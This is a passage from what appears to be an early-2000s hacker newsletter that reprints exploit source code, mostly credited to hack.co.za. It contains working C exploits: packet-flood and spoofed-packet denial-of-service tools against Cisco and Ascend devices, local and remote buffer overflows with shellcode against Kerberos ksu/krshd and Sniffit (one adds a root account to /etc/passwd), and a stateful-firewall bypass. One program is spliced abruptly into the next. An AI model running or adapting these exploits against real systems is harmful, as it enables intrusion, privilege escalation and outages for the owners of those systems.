= sizeof(struct icmphdr), udplen = sizeof(struct udphdr), iplen = sizeof(struct iphdr), spf_sck; void usage(char *pname) { fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n", pname); fprintf (stderr, "Note: UDP used if a port is specified, otherwise ICMP\n"); exit(0); } u_long host_to_ip(char *host_name) { static u_long ip_bytes; struct hostent *res; res = gethostbyname(host_name); if (res == NULL) return (0); memcpy(&ip_bytes, res->h_addr, res->h_length); return (ip_bytes); } void quit(char *reason) { perror(reason); close(spf_sck); exit(-1); } int do_frags (int sck, u_long src_addr, u_long dst_addr, int port) { int bs, psize; unsigned long x; struct sockaddr_in to; to.sin_family = AF_INET; to.sin_port = 1235; to.sin_addr.s_addr = dst_addr; if (port) psize = iplen + udplen + 1; else psize = iplen + icmplen + 1; memset(&pkt, 0, psize); pkt.ip.version = 4; pkt.ip.ihl = 5; pkt.ip.tot_len = htons(iplen + icmplen) + 40; pkt.ip.id = htons(0x455); pkt.ip.ttl = 255; pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP); pkt.ip.saddr = src_addr; pkt.ip.daddr = dst_addr; pkt.ip.frag_off = htons (8190); if (port) { pkt.proto.udp.source = htons(port|1235); pkt.proto.udp.dest = htons(port); pkt.proto.udp.len = htons(9); pkt.data = 'a'; } else { pkt.proto.icmp.type = ICMP_ECHO; pkt.proto.icmp.code = 0; pkt.proto.icmp.checksum = 0; } while (1) { bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to, sizeof(struct sockaddr)); } return bs; } int main(int argc, char *argv[]) { u_long src_addr, dst_addr; int i, bs=1, port=0; char hostname[32]; if (argc < 2) usage (argv[0]); gethostname (hostname, 32); src_addr = host_to_ip(hostname); while ((i = getopt (argc, argv, "s:p:h")) != EOF) { switch (i) { case 's': dst_addr = host_to_ip(optarg); if (!dst_addr) quit("Bad source address given."); break; case 'p': port = atoi(optarg); if ((port <=0) || (port > 65535)) quit ("Invalid port number given."); break; case 'h': default: usage (argv[0]); } } dst_addr = host_to_ip(argv[argc-1]); if (!dst_addr) quit("Bad destination address given."); spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (!spf_sck) quit("socket()"); if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs, sizeof(bs)) < 0) quit("IP_HDRINCL"); do_frags (spf_sck, src_addr, dst_addr, port); } -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.3 for non-commercial use iQA/AwUBOS2ReDV9eGvIXwM6EQLOzgCgqF+8K+s95q7PXp6WE6HXFJVKXgMAn1ek IAkI+Hv0ul66TxRmIJP1LqRH =sSSM -----END PGP SIGNATURE----- _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 241.0 [IND] cisco remote dos attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #include #include #include #include #include #include #include #include #include #include #include #include unsigned short compute_tcp_checksum(struct tcphdr *th, int len, unsigned long saddr, unsigned long daddr) { unsigned long sum; __asm__(" addl %%ecx, %%ebx adcl %%edx, %%ebx adcl $0, %%ebx " : "=b"(sum) : "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256) : "bx", "cx", "dx" ); __asm__(" movl %%ecx, %%edx cld cmpl $32, %%ecx jb 2f shrl $5, %%ecx clc 1: lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx loop 1b adcl $0, %%ebx movl %%edx, %%ecx 2: andl $28, %%ecx je 4f shrl $2, %%ecx clc 3: lodsl adcl %%eax, %%ebx loop 3b adcl $0, %%ebx 4: movl $0, %%eax testw $2, %%dx je 5f lodsw addl %%eax, %%ebx adcl $0, %%ebx movw $0, %%ax 5: test $1, %%edx je 6f lodsb addl %%eax, %%ebx adcl $0, %%ebx 6: movl %%ebx, %%eax shrl $16, %%eax addw %%ax, %%bx adcw $0, %%bx " : "=b"(sum) : "0"(sum), "c"(len), "S"(th) : "ax", "bx", "cx", "dx", "si" ); return((~sum) & 0xffff); } #define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) ) #define tcp_offset ( sizeof(struct iphdr) ) #define err(x) { fprintf(stderr, x); exit(1); } #define errors(x, y) { fprintf(stderr, x, y); exit(1); } struct iphdr temp_ip; int temp_socket = 0; u_short ip_checksum (u_short * buf, int nwords) { unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } void fixhost (struct sockaddr_in *addr, char *hostname) { struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *) addr; (void) bzero ((char *) address, sizeof (struct sockaddr_in)); address->sin_family = AF_INET; address->sin_addr.s_addr = inet_addr (hostname); if ((int) address->sin_addr.s_addr == -1) { host = gethostbyname (hostname); if (host) { bcopy (host->h_addr, (char *) &address->sin_addr, host->h_length); } else { puts ("Couldn't resolve address!!!"); exit (-1); } } } unsigned int lookup (host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr (host); if (addr == -1) { he = gethostbyname (host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); } return (addr); } unsigned short lookup_port (p) char *p; { int i; struct servent *s; if ((i = atoi (p)) == 0) { if ((s = getservbyname (p, "tcp")) == NULL) errors ("Unknown port %s\n", p); i = ntohs (s->s_port); } return ((unsigned short) i); } void spoof_packet (struct sockaddr_in local, int fromport, \ struct sockaddr_in remote, int toport, ulong sequence, \ int sock, u_char theflag, ulong acknum, \ char *packdata, int datalen) { char *packet; int tempint; if (datalen > 0) datalen++; packet = (char *) malloc (psize + datalen); tempint = toport; toport = fromport; fromport = tempint; { struct tcphdr *fake_tcp; fake_tcp = (struct tcphdr *) (packet + tcp_offset); fake_tcp->th_dport = htons (fromport); fake_tcp->th_sport = htons (toport); fake_tcp->th_flags = theflag; fake_tcp->th_seq = random (); fake_tcp->th_ack = random (); /* this is what really matters, however i randomize everything else to prevent simple rule based filters */ fake_tcp->th_off = random (); fake_tcp->th_win = random (); fake_tcp->th_urp = random (); } if (datalen > 0) { char *tempbuf; tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr)); for (tempint = 0; tempint < datalen - 1; tempint++) { *tempbuf = *packdata; *tempbuf++; *packdata++; } *tempbuf = '\r'; } { struct iphdr *real_ip; real_ip = (struct iphdr *) packet; real_ip->version = 4; real_ip->ihl = 5; real_ip->tot_len = htons (psize + datalen); real_ip->tos = 0; real_ip->ttl = 64; real_ip->protocol = 6; real_ip->check = 0; real_ip->id = 10786; real_ip->frag_off = 0; bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr)); bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr)); temp_ip.saddr = htonl (ntohl (real_ip->daddr)); real_ip->daddr = htonl (ntohl (real_ip->saddr)); real_ip->saddr = temp_ip.saddr; real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1); { struct tcphdr *another_tcp; another_tcp = (struct tcphdr *) (packet + tcp_offset); another_tcp->th_sum = 0; another_tcp->th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen, real_ip->saddr, real_ip->daddr); } } { int result; sock = (int) temp_socket; result = sendto (sock, packet, psize + datalen, 0, (struct sockaddr *) &remote, sizeof (remote)); } free (packet); } void main (argc, argv) int argc; char **argv; { unsigned int daddr; unsigned short dport; struct sockaddr_in sin; int s, i; struct sockaddr_in local, remote; u_long start_seq = 4935835 + getpid (); if (argc != 3) errors ("Usage: %s \n\nDest port of 23n", argv[0]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if (!(daddr = lookup (argv[1]))) err ("Unable to lookup destination address.\n"); dport = lookup_port (argv[2]); sin.sin_family = AF_INET; sin.sin_addr.s_addr = daddr; sin.sin_port = dport; fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1]); fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[1]); /* 500 seems to be enough to kill it */ for (i = 0; i < 500; i++) { start_seq++; local.sin_addr.s_addr = random (); spoof_packet (local, random (), remote, dport, start_seq, (int) s, TH_SYN | TH_RST | TH_ACK, 0, NULL, 0); } } /* www.hack.co.za [22 May]*/ @HWA 242.0 [IND] linux local misc overflow by jim paris. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ jim@jtan.com /******** * ksux.c -- ksu exploit * written January 26, 2000 * Jim Paris * * This program exploits a vulnerability in the 'ksu' utility included * with the MIT Kerberos distribution. Versions prior to 1.1.1 are * vulnerable. * * This exploit is for Linux/x86 with Kerberos version 1.0. Exploits * for other operating systems and versions of Kerberos should also work. * * Since krb5_parse_name will reject input with an @ or /, this shellcode * execs 'sh' instead of '/bin/sh'. As a result, a copy of 'sh' must * reside in the current directory for the exploit to work. * */ #include #include int get_esp(void) { __asm__("movl %esp,%eax"); } char *shellcode="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x02\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xffsh"; #define LEN 0x300 #define RET_OFFSET 0x240 #define JMP_OFFSET 0x240 #define CODE_OFFSET 0x100 int main(int argc, char *argv[]) { int esp=get_esp(); int i,j; char b[LEN]; memset(b,0x90,LEN); memcpy(b+CODE_OFFSET,shellcode,strlen(shellcode)); *(int *)&b[RET_OFFSET]=esp+JMP_OFFSET; b[RET_OFFSET+4]=0; execlp("ksu","ksu","-n",b,NULL); } /* www.hack.co.za [22 May]*/ @HWA 243.0 [IND] linux remote misc overflow by noir. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ noir@gsu.linux.org.tr /* Sniffit 0.3.7Beta Remote Exploit sniffit has to be running (-L mail) flag set for this to work. bug discovery by http://www.s0ftpj.org tested on RedHat 6.0 this will get you a root line in /etc/passwd -->snip... # tail -1 /etc/passwd n0ir::0:0:mr. noir:/:/bin/sh <--end... greetz: gov-boi, CronoS, dustdvl, calaz, everyone at gsu-linux exploit code by noir@gsu.linux.org.tr | noir@olympos.org http://www.olympos.org [RET]{NOP}[shellcode] 3 May 2000 */ #include #include #include #include #include #include #include #include #include unsigned char shellcode[]= { 0xeb, 0x03, 0x5f, 0xeb, 0x05, 0xe8, 0xf8, 0xff, 0xff, 0xff, 0x31, 0xdb, 0xb3, 0x35, 0x01, 0xfb, 0x30, 0xe4, 0x88, 0x63, 0x0b, 0x31, 0xc9, 0x66, 0xb9, 0x01, 0x04, 0x31, 0xd2, 0x66, 0xba, 0xa4, 0x01, 0x31, 0xc0, 0xb0, 0x05, 0xcd, 0x80, 0x89, 0xc3, 0x31, 0xc9, 0xb1, 0x5b, 0x01, 0xf9, 0x31, 0xd2, 0xb2, 0x1d, 0x31, 0xc0, 0xb0, 0x04, 0xcd, 0x80, 0x31, 0xc0, 0xb0, 0x01, 0xcd, 0x80, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73, 0x77, 0x64, 0x01, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x6e, 0x30, 0x69, 0x72, 0x3a, 0x3a, 0x30, 0x3a, 0x30, 0x3a, 0x6d, 0x72, 0x2e, 0x20, 0x6e, 0x6f, 0x69, 0x72, 0x3a, 0x2f, 0x3a, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20 }; int resolv(char *hname, struct in_addr *addr); /*#define RET 0xaabbccdd marker lvalue*/ #define RET 0xbfff5ba3 /*RedHat 6.0 (hedwig)*/ #define NOP 0x90 int main(int argc, char *argv[]) { int fd; int i, l; int align = 11; unsigned long eip = RET, addr = 0, offset = 0; unsigned char ovf[812]; struct sockaddr_in servaddr; if (argc < 2){ fprintf(stderr,"Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n"); fprintf(stderr,"Olympos Security Team http://www.olympos.org\n"); fprintf(stderr,"bug discovery by FuSyS of s0ftpj.org\n"); fprintf(stderr,"\nUsage: %s [offset]\n\n",argv[0]); exit(0); } if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){ perror("socket"); exit(-1); } bzero(&servaddr, sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_port = htons(25); if(!resolv(argv[1], &servaddr.sin_addr)){ herror("gethostbyname"); exit(-1); } if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){ perror("connect"); exit(-1); } printf("Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n"); printf("Olympos Security Team http://www.olympos.org\n"); printf("bug discovery by FuSyS of s0ftpj.org\n"); if(argv[2]) offset = atoi(argv[2]); addr = eip + offset; memset(ovf, NOP, sizeof(ovf)); for( i = 0 ; i < align; i++) ovf[i] = 0x41; for( i = align; i < strlen(ovf) ; i+=4) *((long *) &ovf[i]) = addr; for( i = 230; i < strlen(ovf); i++) ovf[i] = 0x90; for( i = 603, l = 0; l < strlen(shellcode); i++, l++) ovf[i] = shellcode[l]; printf("eip: 0x%lx\n", addr); memcpy(ovf, "mail from:",10); write(fd, ovf, strlen(ovf)); write(fd, "\r\n\n", 3); return 0; } int resolv(char *hname, struct in_addr *addr) { struct hostent *hp; if(inet_aton(hname, addr)) return 1; if ( (hp = gethostbyname(hname)) == NULL) return 0; memcpy((struct in_addr *)addr, (char *)hp->h_addr, sizeof(struct in_addr)); return 1; } /* www.hack.co.za [22 May]*/ @HWA 244.0 [IND] linux remote misc overflow by jim paris. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ jim@jtan.com /******** * kshux.c -- krshd remote exploit * written April 8, 2000 * Jim Paris * * This program exploits a vulnerability in the 'krshd' daemon included * with the MIT Kerberos distribution. All versions are apparently * vulnerable. * * This exploit is for Linux/x86 with Kerberos version 1.0, but you'll * probably need a fair bit of coaxing to get it to work. * * And yes, it's ugly. I need to accept an incoming connection from the * remote server, handle the fact that the overflow goes through two * functions and a toupper(), make sure that certain overwritten pointers * on the remote host's stack are set to valid values so that a strlen * call in krb425_conv_principal() doesn't cause a segfault before we * return into the shellcode, adjust the offset depending on the remote * hostname to properly align things, etc etc. As a result, you'll * probably have a hard time getting this to work -- it took a lot of * hacking and hardcoded numbers to get this to work against my test * systems. * */ #include #include #include #include #include #define LEN 1200 #define OFFSET 0 #define ADDR 0xbfffd7a4 char *sc="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; void get_incoming(int r) { int s, l=1; struct sockaddr_in sa, ra; bzero(&sa,sizeof(sa)); sa.sin_family=AF_INET; sa.sin_addr.s_addr=htonl(INADDR_ANY); sa.sin_port=htons(16474); if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) perror("socket"),exit(1); setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&l,sizeof(l)); if(bind(s,(struct sockaddr *)&sa,sizeof(sa))<0) perror("bind"),exit(1); if(listen(s,1)) perror("listen"),exit(1); write(r,"16474",6); if(accept(s,&sa,&l)<0) perror("accept"),exit(1); } int con_outgoing(char *h) { int s, i; struct sockaddr_in a; struct hostent *e; if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) perror("socket"),exit(1); if((i=inet_addr(h))==INADDR_NONE) { if((e=gethostbyname(h))==NULL) perror("gethostbyname"),exit(1); bcopy(e->h_addr,&i,sizeof(i)); } bzero(&a,sizeof(a)); a.sin_family=AF_INET; a.sin_addr.s_addr=i; a.sin_port=htons(544); if(connect(s,(struct sockaddr *)&a,sizeof(a))<0) perror("connect"),exit(1); return s; } void bus(int s) { int i; fd_set r; char b[1024]; for(;;) { FD_ZERO(&r); FD_SET(0,&r); FD_SET(s,&r); if((i=select(s+1,&r,NULL,NULL,NULL))==-1) perror("select"),exit(1); if(i==0) fprintf(stderr,"closed\n"),exit(0); if(FD_ISSET(s,&r)) { if((i=read(s,b,sizeof(b)))<1) fprintf(stderr,"closed\n"),exit(0); write(1,b,i); } if(FD_ISSET(0,&r)) { if((i=read(0,b,sizeof(b)))<1) fprintf(stderr,"closed\n"),exit(0); write(s,b,i); } } } void main(int ac, char *av[]) { int s, i, j, a=ADDR, o=OFFSET; int l, h; char b[LEN]; if(ac<2) { fprintf(stderr,"%s hostname [addr] [offset]\n",*av); exit(1); } a+=(ac>2)?atoi(av[2]):0; o+=(ac>3)?atoi(av[3]):(4-(strlen(av[1])%4)); o%=4; if(o<0) o+=4; l=(ac>4)?atoi(av[4]):-10; h=(ac>5)?atoi(av[5]):10; fprintf(stderr,"addr=%p, offset=%d\n",a,o); if(isupper(((char *)&a)[0]) || isupper(((char *)&a)[1]) || isupper(((char *)&a)[2]) || isupper(((char *)&a)[3])) fprintf(stderr,"error: addr contains uppercase\n"),exit(0); s=con_outgoing(av[1]); get_incoming(s); sprintf(&b[0],"AUTHV0.1blahblah"); *(int *)(b+16)=htonl(LEN); b[20]=4; b[21]=7; b[22]=123; write(s,b,23); for(i=0;i #include #include #include #include #include #include #include #include #include #include #define err(x) { fprintf(stderr, x); exit(1); } #define errs(x, y) { fprintf(stderr, x, y); exit(1); } /* This magic packet was taken from the Java Configurator */ char ascend_data[] = { 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53}; unsigned short in_cksum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } int sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport) struct sockaddr_in *sin; unsigned short int s, datalen, sport, dport; unsigned long int saddr, daddr; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; char crashme[500]; int i; ip.ihl = 5; ip.version = 4; ip.tos = rand () % 100;; ip.tot_len = htons (28 + datalen); ip.id = htons (31337 + (rand () % 100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum ((char *) &ip, sizeof (ip)); udp.source = htons (sport); udp.dest = htons (dport); udp.len = htons (8 + datalen); udp.check = (short) 0; memcpy (packet, (char *) &ip, sizeof (ip)); memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp)); memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen); /* Append random garbage to the packet, without this the router will think this is a valid probe packet and reply. */ for (i = 0; i < 500; i++) crashme[i] = rand () % 255; memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500); return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0, (struct sockaddr *) sin, sizeof (struct sockaddr_in))); } unsigned int lookup (host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr (host); if (addr == -1) { he = gethostbyname (host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); } return (addr); } void main (argc, argv) int argc; char **argv; { unsigned int saddr, daddr; struct sockaddr_in sin; int s, i; if (argc != 3) errs ("Usage: %s \n", argv[0]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if (!(saddr = lookup (argv[1]))) err ("Unable to lookup source address.\n"); if (!(daddr = lookup (argv[2]))) err ("Unable to lookup destination address.\n"); sin.sin_family = AF_INET; sin.sin_port = 9; sin.sin_addr.s_addr = daddr; if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1) { perror ("sendpkt_udp"); err ("Error sending the UDP packet.\n"); } } /* www.hack.co.za [20 May]*/ @HWA 246.0 [IND] ftp-ozone.c cisco remote bug by dug song. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ dugsong@monkey.org /* ftp-ozone.c Demonstrate a basic layer violation in "stateful" firewall inspection of application data (within IP packets - @#$@#$!): http://www.checkpoint.com/techsupport/alerts/pasvftp.html Dug Song Affected: Checkpoint Software Firewall-1 4.0 Checkpoint Software Firewall-1 3.0 Cisco PIX Firewall 5.1 Cisco PIX Firewall 5.0 Cisco PIX Firewall 4.4(4) Cisco PIX Firewall 4.3 Cisco PIX Firewall 4.2.2 Cisco PIX Firewall 4.2.1 Cisco PIX Firewall 4.1.6b Cisco PIX Firewall 4.1.6 */ #include #include #include #include #include #include #include #include #include #include #include #include #define PAD_LEN 128 /* XXX - anything on BSD, but Linux is weird */ #define GREEN "\033[0m\033[01m\033[32m" #define OFF "\033[0m" jmp_buf env_buf; void usage(void) { fprintf(stderr, "Usage: ftp-ozone [-w win] \n"); exit(1); } u_long resolve_host(char *host) { u_long addr; struct hostent *hp; if (host == NULL) return (0); if ((addr = inet_addr(host)) == -1) { if ((hp = gethostbyname(host)) == NULL) return (0); memcpy((char *)&addr, hp->h_addr, sizeof(addr)); } return (addr); } #define UC(b) (((int)b)&0xff) int ftp_pasv_reply(char *buf, int size, u_long ip, u_short port) { char *p, *q; port = htons(port); p = (char *)&ip; q = (char *)&port; return (snprintf(buf, size, "227 (%d,%d,%d,%d,%d,%d)\r\n", UC(p[0]), UC(p[1]), UC(p[2]), UC(p[3]), UC(q[0]), UC(q[1]))); } void handle_timeout(int sig) { alarm(0); longjmp(env_buf, 1); } void read_server_loop(int fd, int timeout, int pretty) { char buf[2048]; int rlen; if (!setjmp(env_buf)) { signal(SIGALRM, handle_timeout); alarm(timeout); for (;;) { if ((rlen = read(fd, buf, sizeof(buf))) == -1) break; if (pretty) { buf[rlen] = '\0'; if (strncmp(buf, "227 ", 4) == 0) printf("[" GREEN "%s" OFF "]\n", buf); else printf("[%s]\n", buf); } else write(0, buf, rlen); } alarm(0); } } int main(int argc, char *argv[]) { int c, fd, win, len; u_long dst; u_short dport; struct sockaddr_in sin; char buf[1024]; win = PAD_LEN; while ((c = getopt(argc, argv, "w:h?")) != -1) { switch (c) { case 'w': if ((win = atoi(optarg)) == 0) usage(); break; default: usage(); } } argc -= optind; argv += optind; if (argc != 2) usage(); if ((dst = resolve_host(argv[0])) == 0) usage(); if ((dport = atoi(argv[1])) == 0) usage(); /* Connect to FTP server. */ memset(&sin, 0, sizeof(sin)); sin.sin_addr.s_addr = dst; sin.sin_family = AF_INET; sin.sin_port = htons(21); if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); exit(1); } if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &win, sizeof(win)) == -1) { perror("setsockopt"); exit(1); } if (connect(fd, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("connect"); exit(1); } read_server_loop(fd, 10, 0); /* Send padding. */ len = win - 5; /* XXX - "500 '" */ memset(buf, '.', len); if (write(fd, buf, len) != len) { perror("write"); exit(1); } /* Send faked reply. */ len = ftp_pasv_reply(buf, sizeof(buf), dst, dport); if (write(fd, buf, len) != len) { perror("write"); exit(1); } read_server_loop(fd, 5, 1); printf("[ now try connecting to %s %d ]\n", argv[0], dport); for (;;) { ; } /* NOTREACHED */ exit(0); } /* w00w00. */ /* www.hack.co.za [20 May]*/ @HWA 247.0 [IND] reset_state.c cisco remote dos attack by vortexia. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ andrew@cnsec.co.za /* reset_state.c (c) 2000 Citec Network Securities */ /* The code following below is copyright Citec Network Securities */ /* Code was developed for testing, and is written to compile under */ /* FreeBSD */ /* Hi All, just a bit of a security notification. Cisco has been informed of this problem and Im waiting for a fix for the problem, Ive also noted that various other firewalls are effected by this code, though if you wanna know if whatever you are running is effected, you will have to test it. A brief rundown of the problem. If you run routable ips on your internal interface on your pix, and routeable ips on your external interface, so the pix is not running nat, the pix keeps a state table of everything going on. Anything that is not in your state table that attempts to come in from the outside is denied, even if there is a conduit in place to permit anything. Which means that you have to establish a connection from your internal network to your external network before anything external can send data back. This is a really nice feature, unfortunatly there is a big of a bug that I found in this. While testing on in house equipment for possible flaws, as we continually test various products, I found the following. On recieving a RST packet (TCP Reset) from a given host with the correct source and destination port, the PIX will drop the state entry for that particular connection, which means the tcp connection dies due to the fact that no state entry the external box can no longer talk to the internal box. So, if we take a standard raw ip packet, give it a tcp header, and set the source ip as a machine that your internal box is connected to, and the destination ip as your internal machine, set the source port on the spoofed ip as the port the person is connected to, set your destination port on your destination ip cyclically to possible source ports on his side, and send resets, it will drop the persons state table entry, cutting him off from the box he is connected to. Now, the one question I asked when I wrote this, is why does this work, why is there no seq/ack checking on RST packets, this was answered in the TCP RFC, saying that seq/ack numbers are not checked on RST packets, however they are checked on FIN packets, hence using FIN packets for this test is futile without sequence prediction code. There is a simple work around for this problem however, and anyone wishing to know the details of that is free to email me at andrew@cnsec.co.za for details. Below I have posted example code to show the exploit and how it works, and hopefully this will be useful to someone on this list and help fix a fairly nasty denial of service problem. Many Thanks Andrew Alston Citec Network Securities (Director) Phone: (011) 787 4241 Fax: (011) 787 4259 Email: andrew@cnsec.co.za */ #define __BSD_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include struct slist { struct in_addr spoof; struct slist *link; }; /* Spoof list */ int main(int argc, char *argv[]) { int i, int2; int sock; /* Socket stuff */ int on = 1; /* Socket stuff */ struct sockaddr_in sockstruct; /* Socket stuff */ struct ip *iphead; /* IP Header pointer */ struct tcphdr *tcphead; /* TCP Header pointer */ char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)]; /* Our reset packet */ int seq, ack; /* Sequence and Acknowledgement #'s */ FILE *spooffile; /* Spoof file */ char *buffer; /* Spoof file read buffer */ struct slist *scur, *sfirst; /* Spoof linked list pointers */ char src[20], dst[20]; /* Work around for inet_ntoa static */ /* Pointers when using printf() */ int sourcefrom, sourceto, destfrom, destto; /* CMD Line ports */ int target; /* Target address from inet_addr() */ if(argc < 6) { fprintf(stderr, "Usage: %s spoof_file target sps spe dps dpe\n" "target = your victim\n" "sps = Source port start\n" "spe = Source port end\n" "dps = Destination port start\n" "dpe = Destination port end\n", argv[0]); exit(-1); } else { sourcefrom = atoi(argv[3]); sourceto = atoi(argv[4]); destfrom = atoi(argv[5]); destto = atoi(argv[6]); }; if(sourcefrom > sourceto) { printf("Error, start source port must be less than end source port\n"); exit(-1); } else if(destfrom > destto) { printf("Error, start dest port must be less than end dest port\n"); exit(-1); }; printf("Used spoof file %s\n" "Destination: [%s] ports: [%d -> %d]\n" "Target source ports: [%d -> %d]\n", argv[1], argv[2], destfrom, destto, sourcefrom, sourceto); sleep(1); bzero(evilpacket, sizeof(evilpacket)); /* Clean our reset packet */ sfirst = malloc(sizeof(struct slist)); scur = sfirst; scur->link = NULL; /* Setup our spoof linked list */ if(!(buffer = malloc(25))) { perror("malloc"); exit(-1); }; /* Allocate for read buffer */ if ((spooffile = fopen((char *) argv[1], "r")) <= 0) { perror("fopen"); exit(-1); /* Open our spoof file */ } else { while (fgets(buffer, 25, spooffile)) { /* Read till EOF */ if (!(inet_aton(buffer, &(scur->spoof)))) printf("Invalid address found in victim file.. ignoring\n"); else { scur->link = malloc(sizeof(struct slist)); scur = scur->link; scur->link = NULL; /* Cycle l.list */ } }; /* End of while loop */ }; /* End of if {} else {} */ free(buffer); /* Free up our read buffer */ fclose(spooffile); /* Close our spoof file */ scur = sfirst; /* Set spoof list current to first */ if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(-1); } /* Allocate our raw socket */ if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on, sizeof(on)) < 0) { perror("setsockopt"); exit(-1); } /* Set socket options for raw iphead */ 